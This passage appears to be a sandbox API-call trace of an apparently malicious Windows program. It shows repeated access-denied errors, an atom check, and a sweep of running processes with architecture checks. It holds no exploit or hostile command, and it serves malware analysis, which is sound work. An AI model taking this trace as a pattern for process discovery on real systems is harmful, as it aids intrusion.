	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.560] GetLastError () returned 0x5
	[0126.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.561] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.561] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.561] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.561] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.561] CloseHandle (hObject=0x2dc) returned 1
	[0126.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.562] CloseHandle (hObject=0x2dc) returned 1
	[0126.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.562] CloseHandle (hObject=0x2dc) returned 1
	[0126.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.563] CloseHandle (hObject=0x2dc) returned 1
	[0126.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.563] CloseHandle (hObject=0x2dc) returned 1
	[0126.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.563] CloseHandle (hObject=0x2dc) returned 1
	[0126.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.599] CloseHandle (hObject=0x2dc) returned 1
	[0126.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.600] CloseHandle (hObject=0x2dc) returned 1
	[0126.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.601] CloseHandle (hObject=0x2dc) returned 1
	[0126.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.601] CloseHandle (hObject=0x2dc) returned 1
	[0126.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.602] CloseHandle (hObject=0x2dc) returned 1
	[0126.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.602] CloseHandle (hObject=0x2dc) returned 1
	[0126.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.602] CloseHandle (hObject=0x2dc) returned 1
	[0126.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.603] CloseHandle (hObject=0x2dc) returned 1
	[0126.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.603] CloseHandle (hObject=0x2dc) returned 1
	[0126.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.604] CloseHandle (hObject=0x2dc) returned 1
	[0126.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.604] CloseHandle (hObject=0x2dc) returned 1
	[0126.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.605] CloseHandle (hObject=0x2dc) returned 1
	[0126.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.605] CloseHandle (hObject=0x2dc) returned 1
	[0126.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.605] CloseHandle (hObject=0x2dc) returned 1
	[0126.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.606] CloseHandle (hObject=0x2dc) returned 1
	[0126.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.606] CloseHandle (hObject=0x2dc) returned 1
	[0126.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.606] CloseHandle (hObject=0x2dc) returned 1
	[0126.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.607] CloseHandle (hObject=0x2dc) returned 1
	[0126.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.607] CloseHandle (hObject=0x2dc) returned 1
	[0126.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.608] CloseHandle (hObject=0x2dc) returned 1
	[0126.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.608] CloseHandle (hObject=0x2dc) returned 1
	[0126.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.609] CloseHandle (hObject=0x2dc) returned 1
	[0126.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.609] CloseHandle (hObject=0x2dc) returned 1
	[0126.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.609] CloseHandle (hObject=0x2dc) returned 1
	[0126.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.610] CloseHandle (hObject=0x2dc) returned 1
	[0126.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.610] CloseHandle (hObject=0x2dc) returned 1
	[0126.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.610] CloseHandle (hObject=0x2dc) returned 1
	[0126.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.611] CloseHandle (hObject=0x2dc) returned 1
	[0126.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.611] CloseHandle (hObject=0x2dc) returned 1
	[0126.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.612] CloseHandle (hObject=0x2dc) returned 1
	[0126.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.612] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
